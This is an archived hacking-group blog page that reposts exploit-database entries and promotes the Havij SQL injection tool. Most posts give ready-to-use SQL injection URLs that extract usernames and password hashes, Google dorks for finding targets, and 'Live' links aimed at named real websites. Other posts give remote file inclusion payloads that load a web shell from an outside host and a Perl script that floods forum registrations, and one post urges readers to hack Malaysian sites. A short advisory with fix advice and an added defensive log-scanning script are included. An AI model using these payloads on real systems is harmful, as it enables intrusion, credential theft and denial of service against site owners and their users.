Showing posts with label Hacking. Show all posts

Thursday, December 9, 2010

Havij v1.13 Advanced SQL Injection

Description:

Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.

It can take advantage of a vulnerable web application. Using this software, a user can fingerprint the back-end database, retrieve DBMS users and password hashes, dump tables and columns, fetch data from the database, run SQL statements, and even access the underlying file system and execute commands on the operating system.

What makes Havij different from similar tools is its injection methods. The success rate is more than 95% at injecting vulnerable targets using Havij.

The user-friendly GUI (Graphical User Interface) of Havij and its automated settings and detections make it easy to use for everyone, even amateur users.


What's New?

* Oracle error based database added with ability to execute query.
* Getting tables and column when database name is unknown added (mysql)
* Another method added for finding columns count and string column in PostgreSQL
* Automatic keyword finder optimized and some bugs fixed.
* A bug in finding valid string column in mysql fixed.
* 'Key is not unique' bug fixed
* Getting data starts from row 2 when All in One fails - bug fixed
* Run time error when finding keyword fixed.
* False table finding in access fixed.
* keyword correction method made better
* A bug in getting current data base in mssql fixed.
* A secondary method added when input value doesn't return a normal page (usually 404 not found)
* Data extraction bug in html-encoded pages fixed.
* String or integer type detection made better.
* A bug in https injection fixed.

How to use

This tool is for exploiting SQL Injection bugs in web applications.

To use this tool you should know a little about SQL injection.

Enter the target URL, select the HTTP method, then click Analyze.

Note: Make sure the URL is a valid input that returns a normal page, not a 404 or error page.



Licence

The free version of Havij is free software. We hope it is useful for you.
This software is provided "as is" without warranties.
Feel free to share and distribute it anywhere but please keep the files original!

There is a commercial version of Havij that is not free.
To purchase Pro version of Havij please visit Here


Disclaimer

We are NOT responsible for any damage or illegal actions caused by the use of this program. Use at your own risk!

Follow the link below to download Havij 1.13 free version:

Havij v1.13 Free (MD5 checksum: 276a84bda58a9def55eef35bf2838a77)


#indonesiancoder.com

Thursday, September 10, 2009

Mambo Component com_hestar Remote SQL Injection Vulnerability

## com_hestar 1.0.0 ##
## Author : M3NW5 (M3NW5[at]hackermail[dot]com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : Monday, September 07,2009 ##


[ Software Information ]

[+] Software : com_hestar
[+] Version : 1.0.0
[+] Provider : Netvistun - netvistun@netvistun.is
[+] Web Provider : www.netvistun.is
[+] Vulnerability : SQL injection
[+] Google Dork : inurl:"com_hestar"

#####################################################
[ POC ]

http://127.0.0.1/index.php?option=com_hestar&task=showlist&id=-3 union select concat_ws(0x3a,username,password)+from+mos_users--


[ Demo ]

http://www.arbae.is/index.php?option=com_hestar&task=showlist&id=-3 union select concat_ws(0x3a,username,password)+from+mos_users--
#####################################################

[ Greetings ]

[+] All of Indonesian Coder Member, Don Tukulesto, mistersaint, gonzhack, m364tr0n, cyb3r_tr0n, TUCKER, Petrucii, Chercut,
Senot, Joker, Rebel, Quick_5ilv3r, ran, m4ho666, DenBayan, vyc0d
[+] All of Surabayahackerlink Member, Awan, Plaque, rey_cute, Tuex, XNITRO, DraCoola.com
[+] ServerIsDown.org, Jack-, Yadoy666, kecemplungkalen, xshadow, H4ck3rKu
[+] Kill-9 Crew, kaMtiEz, Arianom

[ SHOUT ]

STILL FVCKED TO MALAYSIA, TRULLY THIEF COUNTRY IN ASIA.
Let's Hack Malaysian site. PROUD TO BE INDONESIAN !!!!!

[ Special to ]

Anggie Lestari, eldest daughter of the family of Mr. Dodi and Mrs. Dini ^^ I love you full...

# milw0rm.com [2009-09-09]

Sunday, March 15, 2009

Invision Power Board <= 2.1.4 (Register Users) Denial of Service Exploit

#!/usr/bin/perl
use IO::Socket;
##########################################################
## _______ _______ ______ #
## |______ |______ | \ #
## ______| |______ |_____/ #
## #
##IPB Register Multiple Users Denial of Service #
##Doesn't Work on forums using "Code Confirmation" #
##Created By SkOd #
##SED security Team #
##http://www.sed-team.be #
##skod.uk@gmail.com #
##ISRAEL #
##########################################################

print q{
############################################################
# Invision Power Board Multiple Users DOS #
# Tested on IPB 2.0.1 #
# created By SkOd. SED Security Team #
############################################################
};
$rand=rand(10);
print "Forum Host: ";
$serv = ;
chop ($serv);
print "Forum Path: ";
$path = ;
chop ($path);
for ($i=0; $i<9999; $i++)
{
$name="sedXPL_".$rand.$i;
$data = "act=Reg&CODE=02&coppa_user=0&UserName=".$name."&PassWord=sedbotbeta&PassWord_Check=sedbotbeta&EmailAddress=".$name."\@host.com&EmailAddress_two=".$name."\@host.com&allow_admin_mail=1&allow_member_mail=1&day=11&month=11&year=1985&agree=1";
$len = length $data;
$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "Cennot Connect Host, it's can be beacuse the host dosed";
print $get1 "POST ".$path."index.php HTTP/1.0\n";
print $get1 "Host: ".$serv."\n";
print $get1 "Content-Type: application/x-www-form-urlencoded\n";
print $get1 "Content-Length: ".$len."\n\n";
print $get1 $data;
syswrite STDOUT, "+";
}
print "Forum shuld be Dosed. Check it out...\n";

# milw0rm.com [2006-02-10]

Fear Nothing. Risk Everything.

WWW.INDONESIANCODER.COM

Wednesday, March 11, 2009

CMS WEBjump! Multiple SQL Injection Vulnerabilities

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Powered by Content Management System WEBjump! SQL Injection Vulnerability
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Author : M3NW5
contact : M3NW5@hackermail.com
GreetZ : Anggie Barker,vhiia ^,^
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

--== Dork ==--
Powered by Content Management System WEBjump! "portfolio_genre.php?id="

Exploit : www.sute.com/portfolio_genre.php?id=-67%20union%20select%201,2,@@version--

Live : http://www.leti.cz/portfolio_genre.php?id=-67%20union%20select%201,2,@@version--

--== Dork ==--
Powered by Content Management System WEBjump! "news_id.php?lang="

Exploit : www.sute.com/path/news_id.php?lang=en&id=-92%20union%20select%201,2,3,@@version,5--

Live : http://tower.klif.pl/content/news_id.php?lang=en&id=-92%20union%20select%201,2,3,@@version,5--

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2009-03-10]



VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Friday, March 6, 2009

Jogjacamp JProfile Gold (id_news) Remote SQL Injection Vulnerability

Jogjacamp JProfile Gold SQL Injection

by kecemplungkalen

Vendor : http://jogjacamp.com

bugs : /index.php?action=news.detail&id_news=

exploit : union select concat(username,0x3a,password),2,3 from phpss_account--

POC : http://www.titiandamai.org/index.php?action=news.detail&id_news=6%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

http://www.ligaindonesia.com/index.php?action=news.detail&id_news=1976%20%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

http://hermawan.net/index.php?action=news.detail&id_news=42%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

###############################################################

greetz : Allah
s3t4n and Paman aka Jack-
my family
and all Mainhack BrotherHood
jupe crew, don't just play games all the time :p

# milw0rm.com [2009-03-03]



Wednesday, March 4, 2009

Make a PHP info file

This tutorial will show you how to display Apache PHP configuration.
It is useful in cases when you are going to install a particular application which needs specific requirements like register_globals or long_array turned On or Off.

This can be done by simply uploading one file, for example 'info.php' with the following code included inside:

<?php

// Print all information.
phpinfo();

// Output only the module information.
phpinfo(INFO_MODULES);

?>


Create a text file with your favorite text editor, such as Notepad, then copy and paste the code above into it. Save the file as, for example, info.php and upload it to your server.
Then open http://yourdomain.tld/info.php and you should see a table with the current PHP configuration and module information. Delete the file once you have read the values you need: the output shows server paths, loaded modules and environment variables to anyone who requests the URL.





SSH Explorer SSH Client



SSH Explorer is a new generation SSH/Telnet client and terminal emulator that makes remote Linux server administration look like much more fun than it actually is.
File View panel lets you navigate through and operate with remote directories and files as effortlessly as if they were on your home computer.

The integrated text editor will be a great tool for people who don't like the awkward vi and emacs interface.

SSH Explorer also includes a pack of useful Linux commands and allows you to create your own snippets so you don't have to remember and type them anymore. VT100 terminal emulation, SSH1, SSH2 and Telnet protocols are supported.

PCWIN[dot]COM


Thursday, February 26, 2009

[waraxe-2004-SA#031] Multiple vulnerabilities in e107 version 0.615

www.waraxe.us

Author: Janek Vind "waraxe"
Date: 29. May 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=31

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From the official e107 Website - e107 is a portal / content management system powered by PHP and mySQL that gives you a totally dynamic and professional website out of the box.
Its simple wizard type install process will have you up and running in 5 minutes, and best of all it's completely free.

Homepage: http://e107.org/

Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
First of all, some conditions have to be met on victim server, to be vulnerable:

1. "register_globals" must be "on"
2. mysql must be version 4.x with enabled UNION functionality.

Now, let's discuss those security flaws:

A - Full Path Disclosure:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Many software developers, webmasters, admins and other IT staff are underestimating the full path disclosure as security bug.
Anyway, this information - full path to script - must be kept in secret, when possible, or it will be as little piece of the puzzle amongst many other pieces, which finally will lead to successful attack on the website.

A1 - many scripts can be accessed directly and this will provoke standard php error messages, which leads to full path disclosure.

Examples:
http://localhost/e107_0615/e107_plugins/alt_news/alt_news.php
http://localhost/e107_0615/e107_plugins/backend_menu/backend_menu.php
http://localhost/e107_0615/e107_plugins/clock_menu/clock_menu.php
http://localhost/e107_0615/e107_plugins/counter_menu/counter_menu.php
http://localhost/e107_0615/e107_plugins/login_menu/login_menu.php

... and many-many more, needed to be fixed!

B - Cross-site scripting aka XSS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Potential attacker can use xss to steal the cookies, to read cross-domain forms, etc.
Finally it can lead to admin account compromise and overtaking of the website.

B1 - xss in clock_menu.php through direct access of the script:
http://localhost/e107_0615/e107_plugins/clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22); //--%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

B2 - xss in feature called "email article to a friend":
attacker must be logged off and will enter to inputfield "logged name" this: foobar'>

B3 - xss in feature called "submit news":
Attacker is logged off and will enter to inputfield "logged name" this: foobar'>

B4 - xss in "user settings":
attacker is logged on and makes POST request like this: http://localhost/e107_0615/usersettings.php?avmsg=[xss code here]


C - Remote file inclusion:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Remote inclusion - this is VERY DANGEROUS security hole.
If php is configured with "allow_url_fopen=on" and there is no firewall, which blocks outbound connections, then potential attacker can force VICTIM's php engine to parse ATTACKER's php code!!
This can lead to shell-level server compromise (if there are permissions to execute system commands) with "nobody" or "apache" privileges.
Attacker can then try some local r00t exploits and finally server is 0wned ;)

C1 - remote file inclusion in "secure_img_render.php"
script: http://localhost/e107_0615/e107_handlers/secure_img_render.php?p=http://attacker.com/evil.php
Remark: "register_globals" must be "on" to be successful in exploiting in this way.

D - Sql injection
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Through sql injection potential attacker can gather from database any information he wants.
Including admin's username and password's md5 hash.
There are only 1...2 steps more to admin's account overtaking...

D1 - critical sql injection bug #1 in "content.php" script:
http://localhost/e107_0615/content.php?content.99/**/UNION/**/SELECT/**/null,null,null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*

D2 - critical sql injection bug #2 in "content.php" script:
http://localhost/e107_0615/content.php?query=content_id=99%20UNION%20select%20null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null,null,null%20FROM%20e107_user%20WHERE%20user_id=1/*

D3 - critical sql injection bug in "news.php" script:
http://localhost/e107_0615/news.php?list.99/**/UNION/**/SELECT/**/null,null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*

How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
First of all, i suggest to use newer version 0.616, which seems to be patched against above discussed bugs.
And of course, you are welcome to visit forum on my homepage at http://www.waraxe.us/forum/ , where you can find tutorial about manual fixes.

See ya there!

Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to Raido Kerna and to http://www.gamecheaters.us staff!
Special greets to icenix for helping me in bughunting!

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@yahoo.com
Janek Vind "waraxe"
Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ] ------------------------------------
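
Added example (not part of the advisory and not e107 code): a log-review sketch that flags the request shapes described in sections B, C and D above, run over constructed access-log lines. The function names, rule labels and sample hosts are assumptions of this example; it normalises each query (repeated URL-decoding, `/**/` comment removal) before matching, because the requests above use those substitutions for whitespace.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in Apache combined-log style. Addresses, timestamps
# and hosts are made up; the query strings follow the request shapes listed in
# the advisories on this page.
_P = '192.0.2.10 - - [29/May/2004:10:00:00 +0000] '
SAMPLE_LOG = [
    _P + '"GET /e107_0615/news.php?list.99/**/UNION/**/SELECT/**/null,null/**/FROM/**/e107_user/* HTTP/1.0" 200 5120',
    _P + '"GET /e107_0615/e107_handlers/secure_img_render.php?p=http://attacker.example/evil.php HTTP/1.0" 200 312',
    _P + '"GET /components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://files.example/shell.txt? HTTP/1.1" 200 77',
    _P + '"GET /e107_0615/e107_plugins/clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22);%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.0" 200 900',
    _P + '"GET /index.php?option=com_hestar&task=showlist&id=-3 union select 1,2 HTTP/1.1" 200 4100',
    _P + '"GET /portfolio_genre.php?id=-67%2520union%2520select%25201,2,3 HTTP/1.1" 200 4100',
    _P + '"GET /e107_0615/news.php?item.12 HTTP/1.0" 200 8000',
    _P + '"GET /search.php?q=student+union+selection HTTP/1.1" 200 2048',
]

# The target is matched non-greedily up to " HTTP/x.y" so that request lines
# containing raw, unencoded spaces are still captured whole.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>.+?) HTTP/\d\.\d"')
INLINE_COMMENT_RE = re.compile(r"/\*.*?\*/")
SQLI_RE = re.compile(r"\bunion\s+(?:all\s+)?select\b")
XSS_RE = re.compile(r"<\s*/?\s*script\b")
REMOTE_VALUE_RE = re.compile(r"^(?:https?|ftp)://")


def normalise(text, max_rounds=3):
    """Undo the whitespace substitutes seen in the requests above.

    Decodes %xx and '+' repeatedly (to catch double encoding), replaces SQL
    inline comments such as /**/ with a space, collapses runs of whitespace
    and lowercases the result.
    """
    for _ in range(max_rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    text = INLINE_COMMENT_RE.sub(" ", text)
    return re.sub(r"\s+", " ", text).lower()


def classify(line):
    """Return the set of rule labels ('sqli', 'xss', 'rfi') a log line hits."""
    match = REQUEST_RE.search(line)
    if not match or "?" not in match.group("target"):
        return set()
    query = match.group("target").split("?", 1)[1]
    findings = set()
    flat = normalise(query)
    if SQLI_RE.search(flat):
        findings.add("sqli")
    if XSS_RE.search(flat):
        findings.add("xss")
    # A parameter whose value is itself a remote URL is the shape of the
    # include-path requests. Legitimate redirect parameters also look like
    # this, so a real deployment needs an allowlist of such parameter names.
    for pair in query.split("&"):
        _name, sep, value = pair.partition("=")
        if sep and REMOTE_VALUE_RE.match(normalise(value)):
            findings.add("rfi")
    return findings


def scan(lines):
    """Return (line number, sorted labels) for every flagged line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        findings = classify(line)
        if findings:
            hits.append((number, sorted(findings)))
    return hits


if __name__ == "__main__":
    for number, labels in scan(SAMPLE_LOG):
        print(number, ",".join(labels))
```
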


Thursday, February 19, 2009

md5 hash result




Tuesday, February 17, 2009

Joomla/Mambo Component SWmenuFree 4.0 RFI Vulnerability

######################################################
#
# MAMBO Modules SWmenu 4.0 (ImageManager.php) Remote File Include Vulnerabilities
#
######################################################
#
# script : http://mamboxchange.com/frs/download.php/8109/com_swmenufree4.0.zip
#
######################################################
#
# file : /ImageManager/Classes/ImageManager.php
#
######################################################
#
# Dork : index.php?option=com_swmenupro
#
######################################################
#
# Found by & Contact : Cold z3ro , Cold-z3ro@hotmail.com , http://hack-teach.com/ , Team Hell
#
######################################################
#
# require_once($mosConfig_absolute_path."/administrator/components/com_swmenupro/ImageManager/Classes/Files.php");
#
######################################################
#
# Exploit :
#
# Here one : http://www.example.com/MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=Evil-script?
#
# Or : http://www.example.com/MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=Evil-script?
#
######################################################


---- GreeTz: |MoHaNdKo| |Cold One| |Cold ThreE| |Viper Hacker| |The Wolf KSA| |o0xxdark0o| | Kof2002 | |OrGanza| |H@mLiT| |Snake12| |Root Shell|
|Metoovit| |Fucker_net| |Rageb| |CoDeR| |HuGe| |Str0ke| |Dr.TaiGaR| |BLacK HackErD| |JEeN HacKer| |Nazy L!unx| |KURTEFENDY|
|Spid1r Net| |Big Hacker| |Hacccr| |hacoor| || |Geniral C| |Mr.TyrAnT| |Zax| |Zooz| | Al 3afreat | |The-Falcon-Ksa|
| The Sniper | . ||| Team Hell ||| | DearMan | |Pro Hacker| | 020 | | abdulla00 " alz3eem" | | The_Viper |
All i know


#Big Thx For : www.4azhar.com , Viva My HomeLand Palestine

# milw0rm.com [2007-03-23]



Joomla/Mambo Component Taskhopper 1.1 RFI Vulnerabilities

==================================================
Joomla/Mambo Component Taskhopper 1.1 (/inc/ mosConfig_absolute_path) RFI
==================================================
Found By : Cold z3ro , Cold-z3ro@hotmail.com
==================================================
Homepage: www.Hack-Teach.com
==================================================
Script Site : http://taskhopper.com/One1
==================================================
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
==================================================



#Long Life Palestine
#www.Hack-Teach.com

# milw0rm.com [2007-04-10]


Mambo Component Quran <= 1.1 (surano) SQL Injection Vulnerability

+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
--found by breaker_unit and Don
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+

Qur'an component allows you to read and listen to the Qur'an (The Islamic Holybook) online. A great resource for Islamic sites running on Mambo Open Source. This component was originally developed for PHP-Nuke by Syed Rasel at http://www.nzmuslim.net and then modified/ported to PostNuke and Mambo Open Source by Kemas Yunus Antonius.

Key Features:

* Displaying the Qur'an in Arabic and its translations.
* Enhanced with search function (using any keywords or by chapter number and verse number).
* Arabic recitation for both listening and downloading.
* Very user friendly.
* Using mysql database instead of file text.

Available translations at the moment:

* English
* Indonesian

You can get them all at http://www.kyantonius.com.


+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
allinurl:"com_quran"
inurl:"/index.php?option=com_quran"
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
Mambo
/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+mos_users+limit+0,20--

Joomla
/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+jos_users+limit+0,20--

Greetz to:
balcan-crew.org
milw0rm.com
h4cky0u.biz

# milw0rm.com [2008-02-15]




YACS CMS 8.11 update_trailer.php Remote File Inclusion Vulnerability

-----------------[remote file include]-----------------

script: YACS version 8.11

------------------------------------------------------------------

download from: http://www.yetanothercommunitysystem.com/file-fetch/814-20081130-yacs-8.11rc30.zip


==============================================
vul: /yacs/scripts/update_trailer.php line 21 23 25;


include_once $context['path_to_root'].'shared/safe.php'; 21
if(!class_exists('i18n'))
include_once $context['path_to_root'].'i18n/i18n.php'; 23
if(!class_exists('SQL'))
include_once $context['path_to_root'].'shared/sql.php'; 25



==============================================

dork: "Powered by yacs"
----------------------------------------------

xpl:

http://127.0.0.1/path/yacs/scripts/update_trailer.php?context[path_to_root]=[shell.txt?]

http://127.0.0.1/yacs/scripts/update_trailer.php?context[path_to_root]=[shell.txt?]

***************************************************

---------------------------------------------------
Author: ahmadbady [kivi_hacker666@yahoo.com]

from[iran]
---------------------------------------------------

# milw0rm.com [2009-02-16]



Thursday, February 12, 2009

Joomla and Mambo eWriting 1.2.1 Components - SQL injection

eWriting 1.2.1 - SQL injection

# Discovered by breaker_unit & Don
# BHack
# b4lc4n.org
# Gretz to h4cky0u.org l r00tsecurity.org l h4cky0u.biz l

Dorks:

"Powered by eWriting 1.2.1
allinurl:"com_ewriting"


Joomla!
/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+jos_users--


Mambo
/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+mos_users--


+++++++++++++++++++++++++++++++++++++

# milw0rm.com [2008-03-10]


==============================================================
EXAMPLE FROM ME :

http://sexxxploration.com/cms/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+jos_users--




Friday, November 28, 2008

Joomla - com_books SQL Injection

#################################################################################
#[~] Author : boom3rang
#[~] Kosova Hackers Group [www.khg-crew.ws]
#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
#[!] Module_Name: com_books
#[!] Script_Name: Joomla
#[!] Google_Dork: inurl:"com_books"
#################################################################################

#[~] Example:
index.php?option=com_books&task=book_details&book_id=[exploit]



#[~]Exploit:
-9999+UNION+SELECT+1,2,concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users--


##############################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania
##############################

# milw0rm.com [2008-11-11]




Saturday, November 15, 2008

dynaWeb - Remote File Include

#############################################################
# Application Name : dynaWeb
# Vulnerable Type : Remote File Include
# Infection : Access to the site and the server can be obtained.
# Bug Fix Advice : Undefined values must be defined.
# author : code Hunters TIM
# Script Download : sourceforge.net
#############################################################

< -- bug code start -- >

http://Site/Path/siteQuery.php?sitePath=[Shell]

< -- bug code end of -- >





VIVA INDONESIAN CODER TEAM
Get The Code and Feel The SOUL

phpxD - Remote File Include

#############################################################
# Application Name : phpxD
# Vulnerable Type : Remote File Include
# Infection : Access to the site and the server can be obtained.
# Bug Fix Advice : Undefined values must be defined.
# author : code Hunters TIM
# Script Download : sourceforge.net
#############################################################


Vuln Path :

http://Site/Path/include/parser.php?path=[Shell]
http://Site/Path/include/dtd.php?path=[Shell]
http://site/path/include/dom.php?path=[shell]






BBShop 4.5 Final - Multiple RFI

[o] BBShop 4.5 Final Multiple Remote File Inclusion Vulnerability
Software : BBShop version 4.5
Vendor : http://zzem.co.kr/
Developer : The Win
Author : NoGe

[o] Vulnerable file
bbshop/shop/index.php
bbshop/shop/main.php
bbshop/admin/admin.php
bbshop/admin/index.php
all these files are affected by the _shop_path variable

[o] Exploit
http://localhost/[path]/bbshop/shop/index.php?_shop_path=[evilcode]
http://localhost/[path]/bbshop/shop/main.php?_shop_path=[evilcode]
http://localhost/[path]/bbshop/admin/admin.php?_shop_path=[evilcode]
http://localhost/[path]/bbshop/admin/index.php?_shop_path=[evilcode]

[o] Dork
"bbshop"

NoGe.ZoNe
